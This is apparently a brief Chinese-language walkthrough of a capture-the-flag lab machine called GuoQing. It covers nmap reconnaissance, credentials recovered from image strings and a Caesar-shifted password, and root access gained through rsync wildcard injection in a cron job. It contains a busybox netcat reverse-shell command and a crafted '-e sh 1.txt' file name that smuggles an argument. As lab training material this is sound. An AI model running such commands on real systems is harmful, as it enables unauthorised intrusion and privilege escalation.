Maze-GuoQing靶机-作者:群主-QQ群660930334 #
└─# nmap 192.168.1.238
Starting Nmap 7.92 ( https://nmap.org ) at 2025-10-07 01:22 EDT
Nmap scan report for 192.168.1.238
Host is up (0.00074s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:FE:EB:F8 (Oracle VirtualBox virtual NIC)
访问80没什么东西有一个登录界面通过爆破发现爆破不出来
下载中间这个选择的卷福图片使用strings发现后面有字符密码
─# strings todd.png
todd:toddishandsome
发现密码 hyh hyhforever登录后
有一个password程序反编译获得密钥
vhjidxowqr1
凯撒解密偏移量3
解得密码segfaultno1
登录后查看进程pspy64
/bin/sh -c cd /home/segfault && rsync -t *.txt Guoqing:/tmp/backup/
创建恶意脚本执行
segfault@Guoqing:~$ vi 1.txt
segfault@Guoqing:~$ cat 1.txt
#!/bin/bash
busybox nc 192.168.1.199 6666 -e /bin/bash
segfault@Guoqing:~$
segfault@Guoqing:~$ chmod +x 1.txt
segfault@Guoqing:~$ echo "" > '-e sh 1.txt'
segfault@Guoqing:~$ ls -al
然后监听
└─# nc -lvvp 6666
listening on [any] 6666 ...
192.168.1.238: inverse host lookup failed: Unknown host
connect to [192.168.1.199] from (UNKNOWN) [192.168.1.238] 60544
whoami
root
cat /root/root.txt
flag{root-834xxx}